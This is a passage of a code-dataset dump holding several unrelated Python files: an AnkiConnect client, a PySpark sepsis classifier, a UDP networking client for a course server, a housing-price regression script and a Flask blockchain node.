timedelta(hours=1)\n validate_identity = DomainEmailValidator('zju.edu.cn')\n\n\nurlpatterns = [\n path('zju/login/', LoginView.as_view()),\n path('zju/get_code/', GetCodeView.as_view()),\n]\n","repo_name":"SUSTech-CRA/ustc-hackergame","sub_path":"frontend/auth_providers/zju.py","file_name":"zju.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"42914439558","text":"import json\nimport urllib.request\nfrom typing import Any\nfrom urllib.error import URLError\n\nfrom .utils import error\n\n\nclass AnkiConnect:\n @classmethod\n def find_notes(cls, query: str) -> list[int]:\n return cls._invoke(\"findNotes\", query=query)\n\n @classmethod\n def selected_notes(cls) -> list[int]:\n return cls._invoke(\"guiSelectedNotes\")\n\n @classmethod\n def notes_info(cls, note_ids: list[int]) -> list[dict[str, Any]]:\n return cls._invoke(\"notesInfo\", notes=note_ids)\n\n @classmethod\n def update_note_fields(cls, id: int, fields: dict[str, str]) -> None:\n cls._invoke(\"updateNoteFields\", note=dict(id=id, fields=fields))\n\n @classmethod\n def get_field(cls, note_info: dict[str, Any], field: str) -> str:\n return note_info[\"fields\"][field][\"value\"]\n\n @classmethod\n def update_fields(\n cls,\n note_info: dict[str, Any],\n fields: dict[str, str],\n ) -> bool:\n to_update = {\n k: v for k, v in fields.items() if note_info[\"fields\"][k][\"value\"] != v\n }\n if to_update:\n cls.update_note_fields(note_info[\"noteId\"], fields)\n return True\n return False\n\n @classmethod\n def add_note(cls, deck_name: str, model_name: str, fields: dict[str, str]) -> None:\n result = cls._invoke(\n \"addNote\",\n note=dict(\n deckName=deck_name,\n modelName=model_name,\n fields=fields,\n options=dict(\n allowDuplicate=False,\n duplicateScope=\"deck\",\n duplicateScopeOptions=dict(\n deckName=deck_name, checkAllModels=False\n ),\n ),\n ),\n )\n if not result:\n raise Exception(f\"Could not create card with fields {fields}.\")\n\n @staticmethod\n def _invoke(action: str, **params: Any) -> Any:\n request_json = json.dumps(dict(action=action, params=params, version=6)).encode(\n \"utf-8\"\n )\n try:\n response = json.load(\n urllib.request.urlopen(\n urllib.request.Request(\"http://localhost:8765\", request_json)\n )\n )\n except URLError:\n error(\"Could not open Anki Connect URL. 
Is Anki running?\")\n if len(response) != 2:\n error(\"Response has an unexpected number of fields\")\n if \"error\" not in response:\n error(\"Response is missing required error field\")\n if \"result\" not in response:\n error(\"Response is missing required result field\")\n if response[\"error\"] is not None:\n error(response[\"error\"])\n return response[\"result\"]\n","repo_name":"m09/lkdlt","sub_path":"lkdlt/anki_connect.py","file_name":"anki_connect.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10251181893","text":"from pyspark.ml import Pipeline\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.feature import IndexToString, StringIndexer, VectorIndexer\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nsepsisf = sqlContext.read.format('csv').options(header='true', inferSchema='true').load('sepsis_f.csv')\n(trainingData, testData) = sepsisf.randomSplit([0.7, 0.3])\nlabelIndexer = StringIndexer(inputCol=\"infxnqsofa\", outputCol=\"label\").fit(sepsisf)\nfrom pyspark.ml.feature import VectorAssembler\nvecAssembler = VectorAssembler(inputCols=[\"sepsis_antibiotic\",\"antibiotic\",\"RACE_NUM\",\"ETH_NUM\",\"SEXNUM\",\"icd_ind\",\"icd_rank\",\"sepsis_glucocorticoid\",\"treatment_limit\",\"icd9_477_x\",\"icd9_493_x\",\"age_at_enc\",\"icd9_691_x\",\"temp\",\"biologicals\",\"icd9_995_3\",\"bmi\",\"pain_scale\",\"dnr\",\"dnr_treatment_limit\",\"staph\",\"immunosupp_medname\",\"dncpr_dni\",\"icd9_558_3\",\"albuterol\",\"avpu\",\"avpu_old\",\"dnr_dni\",\"immunosupp_class30\"],outputCol = \"features\")\nlabelConverter = IndexToString(inputCol=\"prediction\", outputCol=\"predictedLabel\", labels=labelIndexer.labels)\nrf = RandomForestClassifier(labelCol=\"label\", featuresCol=\"features\", numTrees=10)\npipeline = Pipeline(stages=[labelIndexer, vecAssembler, rf, labelConverter])\nmodel = pipeline.fit(trainingData)\npredictions = model.transform(testData)\npredictions.select(\"predictedLabel\", \"label\", \"features\").show(5)\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\naccuracy = evaluator.evaluate(predictions)\nprint(accuracy)\n#0.989923015099\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"f1\")\nf1 = evaluator.evaluate(predictions)\nprint(f1)\n#0.984910037612\nevaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"weightedPrecision\")\nwp = evaluator.evaluate(predictions)\nprint(wp)\n#0.979947575823\n","repo_name":"CHABOBO/251project","sub_path":"Code/Random_Forest.py","file_name":"Random_Forest.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9357910905","text":"import socket\nimport random\nimport logging\nfrom timeit import default_timer\n\n# To setup the server we do the following\n# 1. SSH via 'ssh -X np14@149.171.36.192'\n# 2. Login via our password\n# 3. 
Run the command '4123-server -address 0.0.0.0 -port 8319 -file message.txt'\n\nclass RealSnooper:\n def __init__(self, SERVER_IP_ADDR=\"149.171.36.192\", SERVER_PORT=8319):\n self.SERVER_IP_ADDR = SERVER_IP_ADDR\n self.SERVER_PORT = SERVER_PORT\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(2)\n\n self.logger = logging.getLogger(__name__)\n\n self.sock.connect((self.SERVER_IP_ADDR, self.SERVER_PORT))\n \n def settimeout(self, *args, **kwargs):\n self.sock.settimeout(*args, **kwargs)\n \n def close(self):\n self.sock.close()\n \n def _fetch_message(self, Pr, time_sent):\n # run through responses until we get our desired packet\n # duplication or packet losses can occur, which causes this to go out of sync\n msg_id = None\n\n while True: \n try:\n data = self.sock.recv(1024)\n\n # check if last packet contained correct Pr\n try:\n Pt, msg_id, msg = self.decode_packet_response(data)\n except ValueError:\n self.logger.error(f\"Failed to decode packet: len={len(data)} content={data}\")\n raise socket.timeout()\n\n if Pt == Pr:\n break\n except socket.timeout as ex:\n if msg_id is not None:\n self.logger.warning(f\"Timeout with mismatching Pr (sent {Pr}, got {Pt})\")\n else:\n self.logger.warning(f\"Timeout without reply\")\n raise ex\n \n assert Pr == Pt\n\n time_gotten = default_timer()\n rtt = time_gotten - time_sent\n self.logger.debug(f\"Matching reply rtt={rtt*1000:.0f}ms (sent {Pr}, got {Pt})\")\n return (msg_id, msg)\n \n # get a message from the server with our desired Sr \n def get_message(self, Sr, Pr=None, return_callback=False):\n if Pr is None:\n Pr = random.randint(1, 1 << 31)\n\n datagram = self.construct_packet_request(Sr, Pr)\n # self.sock.sendto(datagram, (self.SERVER_IP_ADDR, self.SERVER_PORT))\n \n time_sent = default_timer()\n self.sock.send(datagram)\n\n if not return_callback:\n return self._fetch_message(Pr, time_sent)\n \n def callback():\n return self._fetch_message(Pr, time_sent)\n\n return callback\n\n\n def construct_packet_request(self, Sr, Pr):\n return Sr.to_bytes(4, byteorder=\"big\") + Pr.to_bytes(4, byteorder=\"big\")\n\n def decode_packet_response(self, data):\n Pt = int(data[:4].hex(), 16)\n msg_id = int(data[4:8].hex(), 16)\n msg = data[8:]\n return (Pt, msg_id, msg)","repo_name":"alastairmurrant1/DP-Networks-Group-5","sub_path":"RealSnooperServer.py","file_name":"RealSnooperServer.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4677851600","text":"import os\nimport time\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom numpy import Infinity\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score, mean_absolute_percentage_error\n\n# https://www.kaggle.com/datasets/lildatascientist/raifhackds2021fall\n\n# reform_house_population_1000 - Coefficient of the number of people living within a radius of 1 km by source Reform\n# reform_mean_floor_count_1000 - Average number of storeys of houses within a radius of 1 km according to the source\n# reform_mean_year_building_1000 - Average value of the year of construction of houses within a radius of 1 km\n\nmissing_population = {\n 'Лесозаводск': 35433,\n 'Новопокровка': 3095,\n 'Восток': 3313,\n 'Дальнегорск': 33655,\n 'Дальнереченск': 23613,\n 'Пожарский район, с. 
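# The snooper above measures round-trip time with timeit.default_timer; a
# stripped-down sketch of that timing pattern around any blocking call
# (the function and names here are illustrative).
from timeit import default_timer

def timed(fn, *args):
    start = default_timer()
    result = fn(*args)
    elapsed = default_timer() - start
    return result, elapsed

value, seconds = timed(sum, range(1_000_000))
print(f'{seconds * 1000:.1f} ms')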
Светлогорье, Первый мкр': 1396,\n 'Пластун': 4815,\n 'Лучегорск': 17437,\n 'Пожарский район, Лучегорск пгт': 17437,\n 'Кировский': 8033,\n 'Кировский район, Кировский пгт': 8033,\n 'Горные Ключи': 4302,\n 'Кировский район, Горные Ключи кп': 4302,\n}\n\n\ndef print_features_variance(df):\n for feature in df.columns:\n print(f\"{f'{feature}:':<35}{df[feature].var():>25}\", )\n\n\ndef analyze_variance(train, target):\n print(f'\\n{\" Analyzing Features variance \":.^100}\\n')\n\n print_features_variance(train)\n\n best_error = Infinity\n best_var = 0\n best_features = []\n best_features_to_drop = []\n errors = []\n variances = []\n # vals = [0.001, 0.003, 0.005, 0.1]\n vals = [0, 0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]\n # vals = [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1]\n # vals = [0.01]\n for var in vals:\n features = train.var()[train.var() > var].index.tolist()\n fearures_to_drop = train.var()[train.var() <= var].index.tolist()\n\n train_x = train[features]\n train_y = target\n\n model = LinearRegression()\n model.fit(train_x, train_y)\n y_pred = model.predict(train_x)\n\n r2 = r2_score(train_y, y_pred)\n print(f'Correlation {var}: {r2}')\n\n error = mean_absolute_percentage_error(train_y, y_pred)\n print(f'MAPE {var}: {error}')\n\n if error < best_error:\n best_error = error\n best_features = features\n best_var = var\n best_features_to_drop = fearures_to_drop\n errors.append(error)\n variances.append(var)\n\n print(f'\\nBest features stat: {best_var} {best_error} - \\n{best_features}')\n print(f'\\nFeatures to drop: {best_features_to_drop}')\n\n plt.plot(variances, errors)\n plt.xlabel('Variance')\n plt.ylabel('MAPE')\n plt.show()\n\n print(f'\\n{\" Analyzing Features variance finished \":.^100}\\n')\n return best_features_to_drop\n\n\ndef correlation(df, threshold):\n col_corr = set()\n corr_matrix = df.corr()\n for i in range(len(corr_matrix.columns)):\n for j in range(i):\n if abs(corr_matrix.iloc[i, j]) > threshold:\n colname = corr_matrix.columns[i]\n col_corr.add(colname)\n return col_corr\n\n\ndef show_nan_statistics(df):\n print('\\nNaN statistics:')\n shape = df.shape[0]\n printed_amount = 0\n for column in df.columns:\n nan_amount = df[column].isna().sum()\n if nan_amount > 0:\n print(f'{column}: {nan_amount} ({nan_amount / shape * 100:.2f}%)')\n printed_amount += 1\n if printed_amount == 0:\n print('No NaN values found')\n print('\\n')\n\n\ndef save_first_n_rows(df, file_name, n=10):\n df.head(n).to_csv(f'./misc/{file_name}', index=False)\n\n\ndef print_current_dir():\n print(os.getcwd())\n\n\ndef print_columns_containing_string_values(df):\n print('\\nColumns containing string values:')\n columns = []\n for column in df.columns:\n if df[column].dtype == 'object':\n print(f'{column}: {len(df[column].unique())}')\n columns.append(column)\n print(f'\\nDate difference: {df[\"date\"].max()}, {df[\"date\"].min()}')\n print(f'Total square difference: {df[\"total_square\"].max()}, {df[\"total_square\"].min()}')\n print('\\n')\n return columns\n\n\ndef add_new_features(df):\n print(f'\\n{\" Adding new features \":*^100}\\n')\n\n df['is_moscow'] = df['region'].apply(lambda x: 1 if x == 'Москва' else 0)\n df['is_spb'] = df['region'].apply(lambda x: 1 if x == 'Санкт-Петербург' else 0)\n df['is_moscow_or_spb_oblast'] = \\\n df['region'].apply(lambda x: 1 if x == 'Московская область' or x == 'Ленинградская область' else 0)\n df['is_krsk_oblast'] = df['region'].apply(lambda x: 1 if x == 'Краснодарский край' else 0)\n df['is_region'] = \\\n 
df['region'].apply(\n lambda x: 1 if x not in ['Москва', 'Санкт-Петербург', 'Московская область', 'Ленинградская область',\n 'Краснодарский край'] else 0\n )\n df.drop('region', axis=1, inplace=True)\n print(f'\\nIs moscow: {df[\"is_moscow\"].sum()}')\n print(f'Is spb: {df[\"is_spb\"].sum()}')\n print(f'Is moscow or spb oblast: {df[\"is_moscow_or_spb_oblast\"].sum()}')\n print(f'Is krsk oblast: {df[\"is_krsk_oblast\"].sum()}')\n print(f'Is region: {df[\"is_region\"].sum()}\\n')\n\n cities_with_population_more_than_1_million = ['Москва', 'Санкт-Петербург', 'Новосибирск', 'Екатеринбург', 'Казань',\n 'Нижний Новгород', 'Челябинск', 'Самара', 'Омск',\n 'Ростов-на-Дону', 'Уфа', 'Красноярск', 'Воронеж', 'Пермь',\n 'Волгоград']\n df['is_million'] = df['city'].apply(lambda x: 1 if x in cities_with_population_more_than_1_million else 0)\n df['is_not_million'] = df['city'].apply(lambda x: 1 if x not in cities_with_population_more_than_1_million else 0)\n df.drop('city', axis=1, inplace=True)\n print(f'\\nIs million: {df[\"is_million\"].sum()}')\n print(f'Is not million: {df[\"is_not_million\"].sum()}\\n')\n\n df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\n df['year'] = df['date'].dt.year\n df['month'] = df['date'].dt.month\n\n df['date'] = scale_column_min_max(df['date'])\n\n df['total_square'] = scale_column_min_max(df['total_square'])\n\n df = pd.get_dummies(df, columns=['osm_city_nearest_name', 'realty_type'])\n\n print(f'\\n{\" Adding new features finished \":*^100}\\n')\n return df\n\n\ndef scale_column(column):\n return (column - column.mean()) / column.std()\n\n\ndef scale_column_min_max(column):\n return (column - column.min()) / (column.max() - column.min())\n\n\ndef validate_data(df):\n print(f'\\n{\" Validating data... \":*^100}\\n')\n show_nan_statistics(df)\n\n df['street'] = df['street'].fillna('unknown')\n\n df['osm_city_nearest_population'] = df['osm_city_nearest_population'].fillna(df['city'].map(missing_population))\n\n df['missing_reform_stat'] = df['reform_house_population_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_house_population_1000'] = df['reform_house_population_1000'].fillna(4)\n\n df['missing_reform_stat'] = df['reform_mean_floor_count_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_mean_floor_count_1000'] = df['reform_mean_floor_count_1000'].fillna(3)\n\n df['missing_reform_stat'] = df['reform_mean_year_building_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_mean_year_building_1000'] = df['reform_mean_year_building_1000'].fillna(1970)\n\n df['reform_house_population_500'] = df['reform_house_population_500'].fillna(\n df['reform_house_population_1000']\n )\n\n df['reform_mean_floor_count_500'] = df['reform_mean_floor_count_500'].fillna(\n df['reform_mean_floor_count_1000']\n )\n\n df['reform_mean_year_building_500'] = df['reform_mean_year_building_500'].fillna(\n df['reform_mean_year_building_1000']\n )\n\n df['floor'] = df['floor'].fillna(df['reform_mean_floor_count_1000'])\n\n df['total_square_bin'] = pd.qcut(df['total_square'], q=10, labels=False)\n\n df['floor_bin'] = pd.qcut(df['floor'], q=2, labels=False)\n\n df = add_new_features(df)\n\n # show_statistics(df)\n show_nan_statistics(df)\n print(f'\\n{\" Data validation finished \":*^100}\\n')\n return df\n\n\ndef show_column_isna_field_features(df, column, features):\n print(f'\\nCity with nan {column} features: \\n'\n f'{df[df[column].isna()][features].drop_duplicates()}')\n\n\ndef show_statistics(train_df):\n print(f'\\n{\" TABLE statistics \":-^100}')\n\n 
print(f'\\nNumber of rows: {train_df.shape[0]}')\n    print(f'Number of columns: {train_df.shape[1]}')\n\n    # show_column_isna_field_features(train_df, 'osm_city_nearest_population', ['city', 'region'])\n\n    # show_column_isna_field_features(train_df, 'reform_house_population_1000', ['region'])\n\n    # show_column_isna_field_features(train_df, 'reform_mean_floor_count_1000', ['region'])\n\n    # show_column_isna_field_features(train_df, 'reform_mean_year_building_1000', ['region'])\n\n    # show_column_unique_values_stat(train_df['region'])\n\n    string_columns = print_columns_containing_string_values(train_df)\n\n    # unique_values_amount(string_columns, train_df)\n\n    print('-' * 100)\n    return string_columns\n\n\ndef unique_values_amount(string_columns, train_df):\n    print('\\nNumber of unique values in each column:')\n    for column in train_df.columns:\n        if column not in string_columns:\n            print(f'{column}: {train_df[column].nunique()}')\n\n\ndef show_train_statistics(train):\n    print(f'\\n{\" Average per_square_meter_price for each region \":-^100}')\n    print(train.groupby('region')['per_square_meter_price'].mean())\n\n\ndef statistics(predicted_price, test):\n    test['predicted_price'] = predicted_price\n\n    print(f'\\n{\" Regions which have predicted_price more than 200000 and less than 1000000 \":-^100}')\n    print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)]['region'].unique())\n\n    print(f'\\n{\" Min and max total_squares which have predicted_price more than 200000 and less than 1000000 \":-^100}')\n    print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)][\n        ['total_square', 'predicted_price']].min())\n    print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)][\n        ['total_square', 'predicted_price']].max())\n\n\ndef analyze_correlation(train, target):\n    print(f'\\n{\" Correlation between features and target \":-^100}')\n\n    vals = [0.4, 0.6, 0.7, 0.8, 0.9, 0.95, 0.96, 0.97]\n    best_val = 0\n    best_error = float('inf')\n    errors = []\n    best_features_to_drop = []\n    correlations = []\n    for val in vals:\n        drop = correlation(train, val)\n\n        test_x = train.drop(columns=drop)\n        target_y = target\n\n        model = LinearRegression()\n        model.fit(test_x, target_y)\n\n        predict_y = model.predict(test_x)\n\n        r2 = r2_score(target_y, predict_y)\n        print(f'Correlation {val}: {r2}')\n\n        error = mean_absolute_percentage_error(target_y, predict_y)\n        print(f'MAPE {val}: {error}')\n\n        if error < best_error:\n            best_error = error\n            best_val = val\n            best_features_to_drop = drop\n        errors.append(error)\n        correlations.append(val)\n\n    print(f'\\nBest features stat: {best_val} {best_error} - {best_features_to_drop}')\n\n    plt.plot(correlations, errors)\n    plt.xlabel('Correlation')\n    plt.ylabel('MAPE')\n    plt.show()\n\n    print(f'\\n{\" Analyzing Features correlation finished \":.^100}\\n')\n    return best_features_to_drop\n\n\ndef correlation_with_target(train, target):\n    print(f'\\n{\" Correlation between features and target \":-^100}')\n    train.corrwith(target).to_csv('./misc/correlation_with_target.csv', header=True)\n\n    drop = train.corrwith(target).abs() < 0.01\n\n    drop = list(drop[drop].index)\n\n    print(f'\\n{\" Correlation between features and target ended \":.^100}\\n')\n    return drop\n\n\ndef replace_outliers_in_column(param):\n    param = param.copy()\n    q1 = param.quantile(0.05)\n    q3 = param.quantile(0.95)\n    iqr = q3 - q1\n    lower_bound = q1 - 1.5 * iqr\n    upper_bound = q3 + 1.5 * iqr\n    param.loc[param < lower_bound] = np.nan\n    param.loc[param > upper_bound] = np.nan\n    
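# [Editor's sketch, not part of the dataset record above.] Worked example of
# the bound computation in replace_outliers_in_column(). Note the function
# derives its "IQR" from the 5th/95th percentiles rather than the usual
# 25th/75th, so the fences come out very wide; the toy series is invented.
import pandas as pd

s = pd.Series([1, 2, 3, 4, 5, 6, 7, 8, 9, 100])
q1, q3 = s.quantile(0.05), s.quantile(0.95)
iqr = q3 - q1
lower, upper = q1 - 1.5 * iqr, q3 + 1.5 * iqr
print(lower, upper)                  # roughly -85 and 145 for this series
print(s[(s < lower) | (s > upper)])  # empty: even the 100 survives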
param.fillna(param.mean(), inplace=True)\n return param\n\n\ndef replace_outliers_train(train):\n print(f'\\n{\" Replacing outliers for per_square_meter_price \":.^100}')\n\n train['per_square_meter_price'] = train.groupby('region')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n train['per_square_meter_price'] = train.groupby('osm_city_nearest_name')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n train['per_square_meter_price'] = train.groupby('total_square')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n print(f'\\n{\" Replacing outliers for per_square_meter_price ended \":.^100}\\n')\n return train\n\n\ndef replace_outliers(df):\n print(f'\\n{\" Removing outliers \":.^100}')\n\n for column in df.columns:\n if column.startswith('osm_') and df[column].dtype != 'object':\n df[column] = df[column].clip(lower=df[column].quantile(0.05), upper=df[column].quantile(0.95))\n\n for column in df.columns:\n if column.startswith('reform_') and df[column].dtype != 'object':\n df[column] = df[column].clip(lower=df[column].quantile(0.05), upper=df[column].quantile(0.95))\n\n df['total_square'] = df['total_square'].clip(lower=df['total_square'].quantile(0.05),\n upper=df['total_square'].quantile(0.95))\n\n for column in df.columns:\n if column.startswith('osm_') and df[column].dtype != 'object':\n df[column] = np.log1p(df[column])\n\n for column in df.columns:\n if column.startswith('reform_') and df[column].dtype != 'object':\n df[column] = np.log1p(df[column])\n\n print(f'\\n{\" Removing outliers ended \":.^100}\\n')\n return df\n\n\ndef low_variance_stat(train):\n print(f'\\n{\" Low correlation columns \":.^100}')\n for column in train.columns:\n if column != 'per_square_meter_price':\n if train[column].dtype != 'object':\n print(f'{column} correlation with target: {train[column].corr(train[\"per_square_meter_price\"])}')\n\n print(f'\\n{\" Low correlation columns ended \":.^100}\\n')\n\n\ndef main():\n print_current_dir()\n\n predict_target = 'per_square_meter_price'\n\n train = pd.read_csv('./data/train.csv')\n\n train = replace_outliers_train(train)\n\n low_variance_stat(train)\n\n test = pd.read_csv('./data/test_x.csv')\n\n test_copy = test.copy()\n\n target = train[predict_target]\n train.drop(columns=[predict_target], axis=1, inplace=True)\n\n df = pd.concat([train, test], axis=0)\n\n show_statistics(df)\n\n # df.describe().round(2).T.to_csv('./misc/describe_before.csv', header=True)\n\n df = validate_data(df)\n\n df = replace_outliers(df)\n\n # df.describe().round(2).T.to_csv('./misc/describe_after.csv', header=True)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n string_values = show_statistics(df)\n\n df.drop(columns=string_values, axis=1, inplace=True)\n\n print(f'\\n{\" Predicting... 
\":.^100}\\n')\n\n train = df.iloc[:len(target)]\n test = df.iloc[len(target):]\n\n drop1 = analyze_variance(train, target)\n df = df.drop(columns=drop1)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n # drop3 = analyze_correlation(train, target) # testing\n drop2 = list(correlation(df, 0.8))\n print(drop2)\n df = df.drop(columns=drop2)\n\n # train = df.iloc[:len(target)]\n # test = df.iloc[len(target):]\n # drop3 = correlation_with_target(train, target)\n # print(drop3)\n # df = df.drop(columns=drop3)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n train = df.iloc[:len(target)]\n test = df.iloc[len(target):]\n\n model = LinearRegression()\n model.fit(train, target)\n\n predicted_price = model.predict(test)\n\n statistics(predicted_price, test_copy)\n\n predicted_price_df = pd.DataFrame({'id': range(len(predicted_price)), predict_target: predicted_price})\n\n predicted_price_df[predict_target] = predicted_price_df[predict_target].clip(lower=1)\n\n predicted_price_df.to_csv('./res/predicted_price.csv', index=False)\n\n # hist(predicted_price, target)\n\n print(f'\\n{\" Predicted \":.^100}\\n')\n\n\ndef hist(predicted_price, target):\n predicted_price = np.log1p(predicted_price - predicted_price.min() + 1)\n target = np.log1p(target)\n min_val = min(min(predicted_price), min(target))\n max_val = max(max(predicted_price), max(target))\n plt.hist(predicted_price, bins=100, range=(min_val, max_val), alpha=0.5, label='predicted price')\n plt.hist(target, bins=100, range=(min_val, max_val), alpha=0.5, label='real price')\n plt.legend(loc='upper right')\n plt.title(f'Predicted price and real price histogram plot at {time.strftime(\"%H:%M:%S\")}')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RuslanZaripov/ITMO","sub_path":"data-analysis/lab-4/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":17508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870603456","text":"from logging import exception\nfrom block_chain_lab import Block,BlockChain\nfrom flask import Flask,request,render_template,redirect,session \nimport json\nimport requests\nimport time\nfrom flask_cors import CORS,cross_origin\n\n# set a common port for post request coming form other submissin pages \nport = 5000\n\n#this part initialize flask application\n\napp = Flask(__name__)\n# CORS(app)\nCORS(app, resources={r\"/new_transaction/*\": {\"origins\": \"*\"}})\n\n#this part initialize a blockchian object\nblockchian = BlockChain()\n\n\n#this part declars flask endpoint\n@app.route('/new_transaction',methods=['POST'])\n# @cross_origin()\ndef new_transaction():\n tx_data = request.get_json()\n required_field = tx_data\n # print(required_field)\n tx_data1 = json.dumps(tx_data)\n tx_data = json.loads(tx_data1)\n \n for field in required_field:\n if not tx_data.get(field):\n return \"Invalid Transaction\",404\n \n tx_data[\"timestamp\"] = time.time()\n \n blockchian.add_new_transaction(tx_data)\n\n # mine the block\n requests.get(\"http://127.0.0.1:5000/mine\")\n\n # return success\n return \"Success\", 201\n\n # print(required_field)\n # return required_field\n\n#this part is to get the chain of data\n@app.route('/chain',methods=['GET'])\n@cross_origin()\ndef get_chain():\n chain_data = []\n for block in blockchian.chain:\n chain_data.append(block.__dict__)\n return json.dumps({\"lenght\":len(chain_data),\"chain\":chain_data})\n\n#this part is an endpoint to mine transaction\n@app.route('/mine',methods=['GET'])\n@cross_origin()\ndef 
mine_unconfirmed_transaction():\n    result = blockchian.mine()\n    if not result:\n        return \"No transaction to mine\"\n    else:\n        chain_length = len(blockchian.chain)\n        consensus()\n        if chain_length == len(blockchian.chain):\n            announce_new_block(blockchian.last_block)\n        return \"Block #{} is mined.\".format(blockchian.last_block.index)\n\n#this part returns pending transactions\n@app.route('/pending_tx')\ndef get_pending_tx():\n    return json.dumps(blockchian.unconfirmed_transaction)\n\n\n'''\n    This part makes it possible for other nodes\n    to be aware of other peers in the network.\n'''\n\npeers = set()\n\n#This is an endpoint that helps to add new peers to the network\n@app.route('/register_node',methods=['POST'])\n@cross_origin()\ndef register_new_peers():\n    node_address = request.get_json()['node_address']\n    if not node_address:\n        return \"Invalid data\", 400\n\n    #Add new peers to the block\n    peers.add(node_address)\n\n    # Return the blockchain to the newly registered node so that it can sync\n    return get_chain()\n\n#this part allows peers to register with new nodes\n@app.route('/register_with',methods=['POST'])\n@cross_origin()\ndef register_with_existing_node():\n    node_address = request.get_json()['node_address']\n\n    if not node_address:\n        return \"Invalid data\",400\n\n    data = {'node_address':request.host_url}\n    headers = {\"Content-Type\":\"application/json\"}\n\n    #this part makes a request to register with remote nodes\n    response = requests.post(node_address + \"register_node\",data=json.dumps(data),headers=headers)\n\n    #this part checks if there is a response\n    if response.status_code == 200:\n        global blockchian\n        global peers\n\n        #this part updates the block and the peers\n        chain_dump = response.json()['chain']\n        blockchian = create_chain_from_dumps(chain_dump)\n        peers.update(response.json()['peers'])\n        return \"registration successful\", 200\n\n    else:\n        return response.content, response.status_code\n\n#this part creates a chain from dumps\ndef create_chain_from_dumps(chain_dump):\n    blockchian = BlockChain()\n    for idx,block_data in enumerate(chain_dump):\n        block = Block(block_data[\"index\"],block_data[\"transactions\"],block_data[\"timestamp\"],block_data['previous_hash'])\n        proof = block_data['hash']\n        if idx > 0:\n            added = blockchian.add_block(block,proof)\n            if not added:\n                raise Exception(\"The chain dump is tampered\")\n        else:\n            blockchian.chain.append(block)\n\n    return blockchian\n\n\ndef consensus():\n    global blockchian\n    longest_chain = None\n    current_len = len(blockchian.chain)\n\n    for node in peers:\n        response = requests.get('{}/chain'.format(node))\n        chain = response.json()['chain']\n        length = len(chain)\n        if length > current_len and blockchian.check_chain_validity(chain):\n            current_len = length\n            longest_chain = chain\n    if longest_chain:\n        blockchian = create_chain_from_dumps(longest_chain)\n        return True\n\n    return False\n\n#this part provides an endpoint to add mined block to the list of chains\n@app.route('/add_block',methods=['POST'])\n@cross_origin()\ndef verify_and_add_block():\n    block_data = request.get_json()\n    block = Block(block_data['index'],block_data['transactions'],block_data['timestamp'],block_data['previous_hash'])\n\n    proof = block_data['hash']\n    added = blockchian.add_block(block,proof)\n    if not added:\n        return \"The block was discarded by the node\", 400\n\n    return \"Block added to the chain\", 201\n\n\n#this function is to announce new block\ndef announce_new_block(block):\n    for peer in peers:\n        url = \"{}add_block\".format(peer)\n        requests.post(url, 
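# [Editor's sketch, not part of the dataset record above.] The core of
# consensus() above is a longest-valid-chain rule. The same selection,
# condensed, with fetching and validation injected as callables so it runs
# without Flask; all names here are illustrative.
def longest_valid_chain(peers, local_len, fetch_chain, is_valid):
    """Return the longest peer chain dump that beats local_len, else None."""
    best, best_len = None, local_len
    for node in peers:
        chain = fetch_chain(node)  # e.g. GET {node}/chain -> list of block dicts
        if len(chain) > best_len and is_valid(chain):
            best, best_len = chain, len(chain)
    return best

# usage mirroring the record: dump = longest_valid_chain(...)
# if dump: blockchian = create_chain_from_dumps(dump)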
